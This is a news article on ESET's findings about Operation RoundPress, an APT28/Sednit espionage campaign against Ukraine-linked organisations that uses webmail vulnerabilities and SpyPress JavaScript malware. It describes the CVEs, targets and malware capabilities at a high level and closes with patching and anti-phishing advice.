ESET has reported on RoundPress, an advanced cyber espionage initiative conducted by Russia’s Fancy Bear (Sednit), targeting organizations associated with Ukraine through vulnerabilities in webmail systems and deploying SpyPress malware.
Cybersecurity experts at ESET have unveiled a complex cyber espionage campaign, dubbed RoundPress, with “medium confidence” attribution to the Russian-backed Sednit group, also known as APT28 or Fancy Bear. This operation specifically aims at entities related to the ongoing conflict in Ukraine, intent on stealing sensitive data via compromised webmail servers, particularly RoundCube.
The Sednit group has gained notoriety for its involvement in significant cyber incidents, such as the 2016 Democratic National Committee hack, and its recent activities have been documented in attacks against entities like TV5Monde and WADA. In the context of RoundPress, the group utilizes targeted spear-phishing techniques to lure victims into executing malicious JavaScript code, known as SpyPress, which is embedded in emails.
Exploiting Known and Zero-Day Vulnerabilities in Webmail Systems
In a recent publication by ESET, researchers highlighted a trend over the last two years where espionage groups have increasingly targeted webmail servers like Roundcube and Zimbra for email theft, capitalizing on their outdated systems and known vulnerabilities. As of 2023, Sednit was observed exploiting CVE-2020-35730 in Roundcube, but by 2024, their focus extended to vulnerabilities in other platforms, including:
Horde and Zimbra, particularly CVE-2024-27443, which was patched on March 1, 2024. Additionally, they targeted MDaemon, which faced a zero-day vulnerability, CVE-2024-11182, reported on November 1, 2024, with a patch released shortly afterward.
On September 29, 2023, ESET noted a specific incident involving a spear-phishing email sent from katecohen1984@portugalmailpt, which exploited CVE‑2023‑43770 in Roundcube. Such emails often masquerade as news items to entice recipients, including a message sent to a Ukrainian target on September 11, 2024, from kyivinfo24@ukrnet discussing an alleged arrest in Kharkiv.
Primary Focus on Ukraine-Related Entities
The primary targets of Operation RoundPress identified through ESET telemetry include Ukrainian government entities and defense contractors based in Bulgaria and Romania, some of which manufacture Soviet-era weaponry for Ukraine. Furthermore, the campaign has extended its reach to national governmental bodies in Greece, Cameroon, Ecuador, Serbia, and various companies in Ukraine related to telecommunications and civil air transport.
The variants of SpyPress malware, including SpyPress.HORDE, SpyPress.MDAEMON, SpyPress.ROUNDCUBE, and SpyPress.ZIMBRA, exhibit similar obfuscation techniques while communicating with command and control servers through HTTP POST requests. Their functionalities vary significantly, with SpyPress.ROUNDCUBE capable of manipulating email Sieve rules to redirect incoming messages to an attacker-controlled address, and SpyPress.MDAEMON able to generate App Passwords for continuous access.
In summary, the ongoing exploitation of webmail vulnerabilities by groups like Sednit underscores the critical need for organizations to implement timely patches and comprehensive security measures. The techniques employed align with several MITRE ATT&CK tactics, including initial access through spear-phishing, persistence via backdoors, and credential access through password manipulation, highlighting the multi-faceted approach these adversaries take in executing their campaigns.
J Stephen Kowski, Field CTO at SlashNext Email Security, remarked on these developments, noting the capacity for hackers to swiftly refocus their efforts once they exploit weaknesses in widely used email platforms. He emphasized that both commercial and self-hosted email systems carry risks, thus necessitating regular updates and expert maintenance to ensure security.
To mitigate risks effectively, Kowski advocates for continuous updates and patches for email systems, the implementation of robust security measures such as multi-factor authentication, and the use of advanced tools to detect and block phishing attempts before they reach end-users.
